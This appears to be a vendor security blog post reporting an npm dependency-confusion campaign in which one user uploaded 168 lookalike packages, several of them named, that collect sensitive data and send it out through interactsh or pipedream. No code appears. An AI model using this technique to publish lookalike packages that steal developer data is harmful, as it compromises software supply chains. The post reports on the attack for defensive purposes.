Single Author Uploaded 168 Packages to npm as Part of a Massive Dependency Confusion Attack
Table of Contents
Using Mend Supply Chain Defender, Mend’s research team reported and blocked dozens of packages from the same author. These packages targeted developers of many companies and frameworks like slack, Cloudflare, Datadog, Metamask, react, Shopify, OpenSea, Angular and more.
A dependency confusion attack takes advantage of a software developer’s tendency to pull malicious code from public repositories rather than internal ones. It is one of the most effective attack exploits, as it is very easy for a programmer to import a malicious package from an open source registry with an identical name to that which the programmer intended to use.
What Happened?
One npm user named ’amgadesam007’ uploaded 168 packages to npm, targeting various different companies and frameworks. The actor was active from June 15 until he was taken down today, June 20. In this time frame, many packages were uploaded with names like:
‘slack-notifications’
‘Atomic-angular’
‘Cloudflare-docs-engine’
‘Datadog-app’
‘Metamask-state-log-explorer’
‘Shopify-marketplaces-buyer-app’
‘opensea-creatures’
As the first comment under index.js suggests, this is a security researcher under the name mega7 in HackerOne.
Although this is a security researcher, it does not change the fact that those packages are malicious. They collect sensitive information and send the information out with interactsh or piepedeam.
All packages have a similar code and intend to exfiltrate user information:
How to protect your organization from supply chain attacks
Supply chain attacks evolve and grow more frequent each day. Dependency confusion attack attempts are very common. The easiest way to protect this attack surface is to use an automated supply chain security solution such as Mend Supply Chain Defender that informs you when you import a malicious package from open source registries.
Mend enterprise customers using JFrog Artifactory as a private repository manager can prevent malicious open source software from entering their code base using the Mend Supply Chain Defender Integration with JFrog Artifactory.
Learn how Mend Supply Chain Defender blocks software supply chain attacks.